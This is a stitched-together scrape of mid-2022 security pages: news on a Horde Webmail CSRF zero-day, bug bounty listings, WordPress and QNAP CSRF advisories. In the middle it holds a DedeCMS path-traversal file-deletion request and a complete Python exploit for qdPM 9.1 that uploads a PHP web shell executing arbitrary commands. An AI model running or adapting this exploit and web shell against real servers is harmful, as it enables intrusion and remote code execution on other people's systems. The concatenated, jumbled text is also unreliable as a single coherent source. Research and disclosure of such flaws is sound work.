CSRF exploit requires user to open malicious email

CSRF exploit requires user to open malicious email

A zero-day vulnerability in Horde Webmail enables attackers to take over the web server and pivot to compromising an organization’s other services, according to security researchers.

Documented by Swiss security firm Sonar (formerly SonarSource), the flaw’s abuse relies on an authenticated user of the targeted instance opening a malicious email sent by the attacker.

If they do so, they inadvertently trigger the exploit by executing arbitrary code on the underlying server.

**Abandonware**

A patch for the remote code execution (RCE) vulnerability in the open source platform may never surface given that the current version, which contains the flaw, has been flagged by the maintainers as the final release.

Sonar researchers have therefore advised users to abandon Horde Webmail.

Catch up on the latest cybersecurity research

Johannes Dahse, head of R&D at Sonar, said that a Shodan search had revealed more than 3,000 exposed Horde instances worldwide.

“Furthermore, it is integrated into cPanel,” he told The Daily Swig. “As webmail software does not need to be exposed to the internet, we believe that there are even more, internal instances. These instances can still be exploited as long as the email server of an organization is exposed.”

Horde Webmail, which is part of the Horde groupware, provides a browser-based email client and a server that acts as a proxy to the organization’s email server.

By compromising webmail servers, attackers “can intercept every sent and received email, access password-reset links, sensitive documents, impersonate personnel and steal all credentials of users logging into the webmail service,” according to a Sonar blog post by Simon Scannell, vulnerability researcher at Sonar.

**CSRF**

The Horde Webmail vulnerability (CVE-2022-30287) can be abused with a single request, which brings cross-site request forgery (CSRF) into play. “As a result, an attacker can craft a malicious email and include an external image that when rendered exploits the CSRF vulnerability,” Scannell explained.

Worse still, the victim’s clear-text credentials are also leaked to the attacker, potentially giving the adversary access to additional services used by the target organization – as demonstrated in the proof-of-concept video below.

The vulnerability exists in Horde Webmail’s default configuration and potentially lends itself to mass-exploitation, Sonar warns.

It alerted maintainers to the issue on February 2 and disclosed the flaw today (June 1), having notified the maintainers on May 3 that the 90-day disclosure deadline had passed.

Nevertheless, on March 2 Horde released a fix for a separate issue reported previously by Sonar and acknowledged the latest vulnerability report, according to Sonar.

**Salutary lesson**

The researchers point towards a lesson offered by the vulnerability, noting that it exists in PHP code, which typically uses dynamic types.

“In this case, a security sensitive branch was entered if a user-controlled variable was of the type array,” Scannell said. “We highly discourage developers from making security decisions based on the type of a variable, as it is often easy to miss language-specific quirks.”

Sonar last year documented a chained exploit in another open source webmail platform, Zimbra, that allowed unauthenticated attackers to gain control of Zimbra servers.

YOU MIGHT ALSO LIKE Patch released for cross-domain cookie leakage flaw in Guzzle

Horde Webmail contains zero-day RCE bug with no patch on the horizon

New web targets for the discerning hacker

New web targets for the discerning hacker

The US Department of Justice (DoJ) has said it won’t prosecute security researchers acting “in good faith”, as part of changes to the Computer Fraud and Abuse Act (CFAA). While the DoJ says this was always the case in practice, the changes provide more certainty for researchers, pen testers, and bug bounty hunters.

Meanwhile, the UK government remains half-hearted about bug bounty programs, with Dr Ian Levy, technical director of the UK’s National Cyber Security Centre (NCSC), saying there are no plans for a broad rollout any time soon. Speaking at the CyberUK conference, he commented: “The reason for that is that we just don’t seem to need to – people are more than happy to come and tell government we’ve screwed up.”

LinkedIn, meanwhile, has launched a public bug bounty program with rewards of up to $18,000 that replaces its invite-only program. Hosted by HackerOne, LinkedIn invites hackers to probe its main web domain, LinkedIn.com, for security flaws, as well as the LinkedIn API and Android and iOS mobile apps.

Blockchain bridge Wormhole has handed over a record $10 million reward to a bug hunter with the online pseudonym ‘satya0x’. Had it been exploited successfully, the critical vulnerability that attracted the reward could have seen all the funds residing in in the Wormhole core bridge contract on Ethereum lost forever.

In other payout news, Youssef Sammouda netted $44,625 for discovering a series of bugs that could have allowed a malicious actor to take over Facebook accounts. They included a cross-site request forgery (CSRF) bug allowing an attacker to force a victim to log out from their Facebook account in their browser, and a flaw forcing a login to the attacker’s Facebook account inside the victim’s browser.

Pwn2Own Vancouver, the flagship hacking contest, took place last month, handing out more than $1 million for bugs in products from Microsoft, Mozilla, Apple, and others. Participants unearthed 27 qualifying vulnerabilities in total, with a team from Star Labs in Singapore being crowned this year’s Masters of Pwn.

And finally, Vidoc Security Lab has published a security advisory warning of more than 60 instances of a web security flaw in the Swagger-UI library, potentially leading to account takeover. Bug bounty programs operated by PayPal, Shopify, Atlassian, Microsoft, GitLab, and Yahoo were alerted, among others.

**The latest bug bounty programs for June 2022**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**Aztec Network**

Program provider:  
Immunefi

Program type:  
Public

Max reward:  
$1 million

Outline:  
A privacy-first recursive, zero-knowledge rollup built on Ethereum that purports to being the “only zkRollup built from the ground up to be privacy-preserving”.

Notes:  
Bounties on offer potentially range up to $1 million, with $25,000 for high severity issues, and $5,000 for medium severity bugs.

Check out the Aztec Network bug bounty page at Immunefi for more details

**Balancer**

Program provider:  
Immunefi

Program type:  
Public

Max reward:  
$2.4 million

Outline:  
“Community-driven protocol, liquidity provider, and price sensor that empowers decentralized exchange and the automated portfolio management of tokens on the Ethereum blockchain and other EVM compatible systems.”

Notes:  
Payouts in Ethereum could reach $2.4 million, while high severity vulnerabilities can command rewards of up to $600,000.

Check out the Balancer bug bounty page at Immunefi for more details

**Chain**

Program provider:  
Immunefi

Program type:  
Public

Max reward:  
$5 million

Outline:  
Eye-watering payouts in the millions on offer by Chain, which builds “cryptographic ledgers that underpin breakthrough financial products and services”.

Notes:  
Payouts are issued in USDC, XCN, USDT and ETH, with the ratio at Chain’s discretion.

Check out the Chain bug bounty page at Immunefi for more details

**Cudos Network**

Program provider:  
Bugcrowd

Program type:  
Public

Max reward:  
$4,500

Outline:  
A decentralised platform that runs over multiple p2p nodes and enables developers to build complex smart contract functionality.

Notes:  
Top-tier rewards given for cryptographic exploits allowing for the manipulation of BFT consensus, while certain DDoS exploits qualify as tier two.

Check out the Cudos Network bug bounty page at Bugcrowd for more details

**Doctolib**

Program provider:  
YesWeHack

Program type:  
Public

Max reward:  
€20,000

Outline:  
Doctolib develops appointment booking software used by more than 300,000 healthcare personnel and 60 million patients across Europe.

Notes:  
High severity issues command rewards of up to €4,000 and critical bugs will net hackers up to €20,000, with two web domains and iOS and Android apps in play.

Check out the Doctolib bug bounty page at YesWeHack for more details

**Gojek**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$5,000

Outline:  
Gojek is an Indonesian, on-demand, multi-service platform and digital payment technology group.

Notes:  
Maximum bounty of $5,000 on offer for tier-one assets, and $2,000 for tier-two assets.

Check out the Gojek bug bounty page at HackerOne for more details

**LinkedIn**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$15,000

Outline:  
LinkedIn has launched a public bug bounty program to replace the invite-only program running since 2014, as previously reported by The Daily Swig.

Notes:  
Critical security vulnerabilities discovered on the business-oriented social media platform will net researchers bounties ranging from $5,000 up to $15,000.

Read our previous coverage to find out more

**Razorpay**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$3,000

Outline:  
Razorpay claims to be the only payments solution in India that allows businesses to accept, process, and disburse payments.

Notes:  
Critical flaws will command bounties of between $1,000 and $3,000, with four in-scope targets comprising the dashboard, API, checkout, and invoice domains.

Check out the Razorpay bug bounty page at HackerOne for more details

**Quebec Ministry of Cybersecurity and Digital**

Program provider:  
YesWeHack

Program type:  
Public

Max reward:  
C$1,500

Outline:  
Le ministère de la Cybersécurité et du Numérique has launched its program, with details written in French, on Paris-base bug bounty platform YesWeHack.

Notes:  
The ministry has 12 web assets in scope and is offering a maximum payout of C$1,500.

Check out Le ministère de la Cybersécurité et du Numérique bug bounty page at YesWeHack for more details

**Wealthsimple**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$20,000

Outline:  
The Canadian investment management service has financial tools for stock trading, ETFs, managed investing, and crypto.

Notes:  
Critical bugs can attract $20,000 rewards, while high and medium severity vulnerabilities could net bug hunters $5,000 or $1,000 respectively.

Check out the Wealthsimple bug bounty page at HackerOne for more details

**Other bug bounty and VDP news this month**

*   Another nine new programs in a bumper May for Immunefi included programs from the Bancor Protocol (max reward $900,000) plus Orca and Wombat Exchange (both with a maximum payout of $500,000)
*   Cloudflare and security researchers from Assetnote have documented the discovery and remediation of vulnerabilities in Cloudflare Pages
*   YesWeHack is launching an ethical hacking virtual reality game and holding a live bug bounty challenge at the upcoming International Cybersecurity Forum in June
*   The US Cyber Games, a NICE-NIST collaboration, enters its second season in July, starting with Capture the Flag (CTF) competitions and culminating in the top cybersecurity athletes representing the US internationally
*   Some 401 security flaws were remediated during the 12-month pilot of the US Defense Industrial Base\-Vulnerability Disclosure Program (DIB-VDP), which concluded in April

Additional reporting by Emma Woollacott.

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for May 2022

Bug Bounty Radar // The latest bug bounty programs for June 2022

The Bulk Page Creator WordPress plugin before 1.1.4 does not protect its page creation functionalities with nonce checks, which makes them vulnerable to CSRF.

CVE-2022-1611

The Change wp-admin login WordPress plugin before 1.1.0 does not properly check for authorisation and is also missing CSRF check when updating its settings, which could allow unauthenticated users to change the settings. The attacked could also be performed via a CSRF vector

CVE-2022-1589

The JivoChat Live Chat WordPress plugin before 1.3.5.4 does not properly check CSRF tokens on POST requests to the plugins admin page, and does not sanitise some parameters, leading to a stored Cross-Site Scripting vulnerability where an attacker can trick a logged in administrator to inject arbitrary javascript.

CVE-2022-0642

The Content Mask WordPress plugin before 1.8.4.1 does not have authorisation and CSRF checks in various AJAX actions, as well as does not validate the option to be updated to ensure it belongs to the plugin. As a result, any authenticated user, such as subscriber could modify arbitrary blog options

CVE-2022-1203

DedeCMS v5.7.93 was discovered to contain arbitrary file deletion vulnerability in upload.php via the delete parameter.

Permalink

**Dedecms has Arbitrary file deletion**

*   Affected product: Dedecms 5.7.93
*   Attack type: Remote
*   Affected component: /dede/upload.php
*   Description: DedeCMS v5.7.93 was discovered to contain arbitrary file deletion vulnerability in upload.php via the delete parameter.
*   Comment: The Version 5.93 used to repair Arbitrary file deletion, but there is still a way to bypass

**POC**

You can attack with low administrator privileges

    GET /dede/upload.php?delete=dede/../../../../../../../../../flag HTTP/1.1
    Host: dedecms5793
    Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=5dmda8e360sct3jfhq5bhupfi1; _csrf_name_087a8580=71d08ef049948bbc07ae269bda502532; _csrf_name_087a85801BH21ANI1AGD297L1FF21LN02BGE1DNG=d7b9a721f2afba6c; DedeUserID=3; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=55ecf92b6c33a0e4; DedeLoginTime=1651835206; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=a93eb3d3f937052f; lastCid=1; lastCid1BH21ANI1AGD297L1FF21LN02BGE1DNG=2b4648712e49895f; ENV_GOBACK_URL=%2Fdede%2Fcontent_i_list.php%3Fchannelid%3D2
    
    

**Details**

The Version 5.93 added 17 lines of code.

$delete = preg\_replace("#^(\[.\]\*\[/\]\*)\*#", "", $delete);

It can easily be bypassed by 'dede/../../../../../../../../../flag'

Then at line 34 the file is deleted

CVE-2022-30508: Vulnerability/1.md at master · 1security/Vulnerability

qdPM version 9.1 authenticated remote code execution exploit that leverages a path traversal.

    # Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net# Date: 2021-08-03# Original Exploit Author: Rishal Dwivedi (Loginsoft)# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)# Exploit Author: Leon Trappett (thepcn3rd)# Vendor Homepage: http://qdpm.net/# Software Link: http://qdpm.net/download-qdpm-free-project-management# Version: <=1.9.1# Tested on: Ubuntu Server 20.04 (Python 3.9.2)# CVE : CVE-2020-7246# Exploit written in Python 3.9.2# Tested Environment - Ubuntu Server 20.04 LTS# Path Traversal + Remote Code Execution# Exploit modification: RedHatAugust#!/usr/bin/python3import sysimport requestsfrom lxml import htmlfrom argparse import ArgumentParsersession_requests = requests.session()def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):    request_1 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, uservar),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[remove_photo]': (None, '1'),        }    return request_1def req(userid, username, csrftoken_, EMAIL, HOSTNAME):    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)    request_3 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, ''),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),        }    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)def main(HOSTNAME, EMAIL, PASSWORD):    url = HOSTNAME + '/index.php/login'    result = session_requests.get(url)    #print(result.text)    login_tree = html.fromstring(result.text)    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))    # The designated admin account does not have a myAccount page    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')    account_tree = html.fromstring(account_page.content)    userid = account_tree.xpath("//input[@name='users[id]']/@value")    username = account_tree.xpath("//input[@name='users[name]']/@value")    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")    req(userid, username, csrftoken_, EMAIL, HOSTNAME)    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')    final_tree = html.fromstring(get_file.content)    backdoor = requests.get(HOSTNAME + "uploads/users/")    count = 0    dateStamp = "1970-01-01 00:00"    backdoorFile = ""    for line in backdoor.text.split("\n"):        count = count + 1        if "backdoor.php" in str(line):            try:                start = "\"right\""                end = " </td"                line = str(line)                dateStampNew = line[line.index(start)+8:line.index(end)]                if (dateStampNew > dateStamp):                    dateStamp = dateStampNew                    print("The DateStamp is " + dateStamp)                    backdoorFile = line[line.index("href")+6:line.index("php")+3]            except:                print("Exception occurred")                continue        #print(backdoor)    print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')if __name__ == '__main__':    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')    parser.add_argument('-p', '--password', dest='password', help='User password')    args = parser.parse_args()    # Added detection if the arguments are passed and populated, if not display the arguments    if  (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):            main(args.hostname, args.email, args.password)    else:        parser.print_help()

qdPM 9.1 Remote Code Execution

Social media platform ends private program after paying $250,000 in rewards over eight years

Adam Bannister 26 May 2022 at 15:26 UTC

Social media platform ends private program after paying $250,000 in rewards over eight years

LinkedIn has launched a public bug bounty program to replace the invite-only program that has been running since 2014.

Critical security vulnerabilities discovered on the business-oriented social media platform will net researchers bounties ranging from $5,000 up to $15,000, while high severity issues will command rewards of between $2,500 and $5,000, and medium severity flaws will net bug hunters between $250 and $2,500.

The program, which is hosted by HackerOne, invites hackers to probe the main web domain, LinkedIn.com, for security flaws, as well as the LinkedIn API plus Android and iOS mobile apps.

**Going public**

In scope on the Microsoft\-owned platform are “implementation and design issues that substantially impact LinkedIn members’ data or LinkedIn infrastructure” such as cross-site scripting (XSS), cross-site request forgery (CSRF), SQL injection, authentication, access control, and server-side code execution vulnerabilities.

“Our security team strives to provide a safe and secure experience for our 830 million members and customers by quickly addressing security vulnerabilities, constantly improving our defenses, and safeguarding our product development process,” said LinkedIn in a blog post announcing the news.

Read more of the latest bug bounty news

The private program had since its launch “awarded more than $250,000 across nearly 500 submissions covering the LinkedIn member platform and mobile applications,” it added.

“Because of the program’s success, we have decided to make the program public and expand participation to anyone wanting to report potential security vulnerabilities.”

LinkedIn, which connects business professionals with each other and job opportunities, was the source of two enormous data leaks in 2021, affected 500 million and 700 million users respectively, but these were attributed to scraping of public web pages rather than cyber-attacks.

However, the Silicon Valley company was apportioned blame, both by security experts and members of the US Congress, over a 2012 hack that it initially thought affected 6.4 million user passwords, but in 2016 transpired to comprise emails and passwords belonging to 117 million users.

RELATED Yik Yak fixes information disclosure bug that leaked users’ GPS location

LinkedIn bug bounty program goes public with rewards of up to $18k

A cross-site request forgery (CSRF) vulnerability has been reported to affect QNAP device running Proxy Server. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Proxy Server: QTS 4.5.x: Proxy Server 1.4.2 ( 2021/12/30 ) and later QuTS hero h5.0.0: Proxy Server 1.4.3 ( 2022/01/18 ) and later QuTScloud c4.5.6: Proxy Server 1.4.2 ( 2021/12/30 ) and later

<< Back to Security Advisory List

*   **Release date:** May 26, 2022
*   **Security ID:** QSA-22-18
*   **Severity:** Medium
*   **CVE identifier:** CVE-2021-34360
*   **Affected products:** QNAP NAS running Proxy Server
*   **Status:** Resolved

**Summary**

A cross-site request forgery (CSRF) vulnerability has been reported to affect QNAP NAS running Proxy Server. If exploited, this vulnerability allows remote attackers to inject malicious code.

We have already fixed this vulnerability in the following versions of Proxy Server:

*   **QTS 4.5.x, QTS 5.0.x:** Proxy Server 1.4.2 (2021/12/30) and later
*   **QuTS hero h5.0.x:** Proxy Server 1.4.3 (2022/01/18) and later
*   **QuTScloud c4.5.x, QuTScloud c5.0.x:** Proxy Server 1.4.2 (2021/12/30) and later

**Recommendation**

To fix the vulnerability, we recommend updating Proxy Server to the latest version.

**Updating Proxy Server**

1.  Log on to QTS, QuTS hero, or QuTScloud as administrator.
2.  Open the **App Center** and then click .  
    A search box appears.
3.  Enter "Proxy Server".  
    Proxy Server appears in the search results.
4.  Click **Update**.  
    A confirmation message appears.  
    **Note:** The **Update** button is not available if your application is already up to date.
5.  Click **OK**.  
    The system updates the application.

**Acknowledgements:** Tony Martin, a security researcher

**Revision History:** V1.0 (May 26, 2022) - Published

Tag

#csrf